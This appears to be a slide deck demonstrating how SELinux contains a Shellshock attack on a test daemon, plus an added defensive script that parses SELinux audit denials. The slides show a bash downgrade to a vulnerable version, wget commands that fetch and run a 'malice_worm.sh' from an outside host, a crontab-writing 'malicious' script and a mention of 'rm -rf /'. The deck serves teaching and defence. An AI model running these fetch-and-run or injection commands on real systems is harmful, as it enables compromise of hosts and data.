Published by Phillip Parker. Modified over 9 years ago
1
The SELinux of First Look
2
Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them disable SELinux rather than understanding why it keeps denying access and what that protection is worth.
3
Content
–Introduce SELinux
–Talk about some vulnerabilities around us
–Attack tests with and without SELinux
–Summary
4
SELinux Security-Enhanced Linux (SELinux) is a mandatory access control (MAC) security mechanism implemented in the kernel.
5
SELinux Policy The SELinux Policy is the set of rules that guide the SELinux security engine. It defines types for file objects and domains for processes. It uses roles to limit the domains that can be entered, and has user identities to specify the roles that can be attained. In essence, types and domains are equivalent, the difference being that types apply to objects while domains apply to processes.
6
Access Control Model
Type Enforcement (TE):
–Type Enforcement is the primary access control mechanism used in the targeted policy.
Role-Based Access Control (RBAC):
–Based on SELinux users (not necessarily the same as Linux users); not used in the default targeted policy.
Multi-Level Security (MLS):
–Not commonly used; requires installing the separate MLS policy.
7
What Can SELinux do? SELinux does not block the exploit itself, but it prevents escalation out of confined domains: SELinux can contain the exploit and limit its impact.
8
Cyber Vulnerabilities In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw[1]. [1]"The Three Tenets of Cyber Security". U.S. Air Force Software Protection Initiative. Retrieved 2009-12-15
9
Major Events Heartbleed (CVE-2014-0160) Shellshock (CVE-2014-6271) …
10
Attack Step 1 1. Make sure Shellshock is not patched. –If your bash version is higher than 4.2.45(1), you need to downgrade it to 4.2.45(1) or lower.
11
Open Loophole –Not necessary
–wget http://test.njucs-os.tk/selinuxtest/bash-4.2.45-5.el7.x86_64.rpm
–yum downgrade bash-4.2.45-5.el7.x86_64.rpm
–wget http://test.njucs-os.tk/selinuxtest/region_date_daemon
–wget http://test.njucs-os.tk/selinuxtest/start.sh
–Run start.sh
12
Attack Step 2 2. Test Shellshock
13
Attack Step 3 3. Run it to serve the current date over TCP. It displays the current date and time in the given format when local-info is input. Example:
14
Attack Step 4 4. Change the file contexts –If SELinux is enabled, the behavior of date_daemon is restricted to its domain by the context.
15
Attack Step 5 5. Prepare the “malicious” script Injector.
#!/bin/bash

now=$(date)
echo "$now: Your OS is pwned!"
echo "$now: Your OS is pwned!" >> /tmp/pwn.log
# appends a comment line to /etc/crontab; this write is what the SELinux test watches for
echo "# $now: Your OS is pwned!" >> /etc/crontab
It is a very friendly malicious script! :P
16
Attack Tests In the test, we write a daemon running on CentOS 7.0.1406 with SELinux in enforcing mode or permissive mode, and run a designed Shellshock attack against it. The set of commands made up for this test, Injector.sh:
–rm malice_worm.sh ;
–wget --no-verbose --output-document=malice_worm.sh http://test.njucs-os.tk/selinuxtest/malice_worm.sh ;
–rm injector.sh ;
–bash malice_worm.sh
17
Attack Step 6 6. Attack OS with SELinux
18
Attack Step 7 7. Attack OS without SELinux
19
What-If… What would happen if the command “rm -rf /” were put in the Injector?
20
Awesome SELinux protects your OS even when software security fails. How does SELinux accomplish this protection? –It uses the control points of objects in the system.
21
Control Point The following types are used with DHCP:
dhcp_etc_t –This type is mainly used for files in the /etc/ directory, including configuration files.
dhcpd_var_run_t –This type is used for the PID file for dhcpd, in the /var/run/ directory.
dhcpd_exec_t –This type is used for transition of DHCP executable files to the dhcpd_t domain.
dhcpd_initrc_exec_t –This type is used for transition of DHCP executable files to the dhcpd_initrc_t domain.
22
But the type of /etc/crontab is system_cron_spool_t, and a process that entered the dhcpd_t domain through dhcpd_exec_t has no rule allowing it to write to system_cron_spool_t, so the write to /etc/crontab is denied.
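When the confined daemon's injected command hits that missing rule, the kernel records an AVC denial in the audit log; in permissive mode the same record appears with permissive=1 but the write goes through. The script below is an added example, not part of the presentation: it parses constructed audit records (pids, timestamps and inode numbers are made up; the type names dhcpd_t and system_cron_spool_t are the ones the slides use) and flags any record in which the dhcpd_t domain attempted to write a system_cron_spool_t file. The function names are ours; the record layout follows what auditd writes for AVC events.

```shell
#!/bin/sh
# Added example: detect a confined domain reaching outside its policy by
# parsing SELinux AVC records. All four records below are constructed for
# this example; on a real host you would feed lines from
# /var/log/audit/audit.log or the output of "ausearch -m AVC".
AVC_ENFORCED='type=AVC msg=audit(1415000000.123:456): avc:  denied  { write } for  pid=1234 comm="bash" name="crontab" dev="dm-0" ino=12345 scontext=system_u:system_r:dhcpd_t:s0 tcontext=system_u:object_r:system_cron_spool_t:s0 tclass=file permissive=0'
SYSCALL_REC='type=SYSCALL msg=audit(1415000000.123:456): arch=c000003e syscall=2 success=no exit=-13 comm="bash" exe="/usr/bin/bash" subj=system_u:system_r:dhcpd_t:s0 key=(null)'
AVC_READ='type=AVC msg=audit(1415000000.124:457): avc:  denied  { read } for  pid=1234 comm="bash" name="crontab" dev="dm-0" ino=12345 scontext=system_u:system_r:dhcpd_t:s0 tcontext=system_u:object_r:system_cron_spool_t:s0 tclass=file permissive=0'
AVC_PERMISSIVE='type=AVC msg=audit(1415000100.500:612): avc:  denied  { write } for  pid=1301 comm="bash" name="crontab" dev="dm-0" ino=12345 scontext=system_u:system_r:dhcpd_t:s0 tcontext=system_u:object_r:system_cron_spool_t:s0 tclass=file permissive=1'
SAMPLE_LOG="$AVC_ENFORCED
$SYSCALL_REC
$AVC_READ
$AVC_PERMISSIVE"

# avc_field RECORD KEY -> value of KEY=... with surrounding quotes stripped
avc_field() {
    printf '%s\n' "$1" | sed -n "s/.*[[:space:]]$2=\"\{0,1\}\([^\" ]*\)\"\{0,1\}.*/\1/p"
}

# avc_perms RECORD -> the space-separated permissions inside "{ ... }"
avc_perms() {
    printf '%s\n' "$1" \
        | sed -n 's/.*avc:[[:space:]]*denied[[:space:]]*{ *\([^}]*\)}.*/\1/p' \
        | sed 's/[[:space:]]*$//'
}

# ctx_type CONTEXT -> the type component of user:role:type[:level]
ctx_type() {
    printf '%s\n' "$1" | cut -d: -f3
}

# avc_matches RECORD SOURCE_DOMAIN TARGET_TYPE PERM
# Succeeds only for an AVC record in which SOURCE_DOMAIN was denied PERM
# on an object of TARGET_TYPE; non-AVC records never match.
avc_matches() {
    rec="$1"; sdom="$2"; ttype="$3"; perm="$4"
    case "$rec" in "type=AVC "*) ;; *) return 1 ;; esac
    [ "$(ctx_type "$(avc_field "$rec" scontext)")" = "$sdom" ] || return 1
    [ "$(ctx_type "$(avc_field "$rec" tcontext)")" = "$ttype" ] || return 1
    case " $(avc_perms "$rec") " in
        *" $perm "*) return 0 ;;
        *) return 1 ;;
    esac
}

# summarize_avc RECORD -> one readable line; says whether the access was
# actually blocked (permissive=0) or only logged (permissive=1)
summarize_avc() {
    rec="$1"
    case "$rec" in "type=AVC "*) ;; *) return 1 ;; esac
    if [ "$(avc_field "$rec" permissive)" = "1" ]; then
        mode="logged only (permissive mode)"
    else
        mode="blocked (enforcing mode)"
    fi
    stype=$(ctx_type "$(avc_field "$rec" scontext)")
    ttype=$(ctx_type "$(avc_field "$rec" tcontext)")
    printf '%s\n' "pid=$(avc_field "$rec" pid) comm=$(avc_field "$rec" comm) $stype -> $ttype { $(avc_perms "$rec") } on $(avc_field "$rec" tclass) $(avc_field "$rec" name): $mode"
}

# count_cron_escapes LOG -> number of records where dhcpd_t tried to write
# a system_cron_spool_t object, in either mode
count_cron_escapes() {
    n=0
    while IFS= read -r rec; do
        if avc_matches "$rec" dhcpd_t system_cron_spool_t write; then
            n=$((n + 1))
        fi
    done <<EOF
$1
EOF
    echo "$n"
}

# report_log LOG -> prints one summary line per AVC record
report_log() {
    while IFS= read -r rec; do
        summarize_avc "$rec" || true
    done <<EOF
$1
EOF
}

report_log "$SAMPLE_LOG"
echo "crontab write attempts from dhcpd_t: $(count_cron_escapes "$SAMPLE_LOG")"
```

The point of distinguishing permissive=0 from permissive=1 is the two test runs on the slides: in permissive mode the audit log shows exactly the same denial record as in enforcing mode, but the write to /etc/crontab succeeds, so the record alone is the detection signal and the mode decides whether it was also a mitigation.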
23
Graphic Interpretation [figure: two panels, “Without SELinux” and “With SELinux”]
24
Conclusion SELinux does not block the exploit itself, but it prevents escalation out of confined domains. On top of SELinux we can build more enhanced security protection mechanisms.
25
Thank you!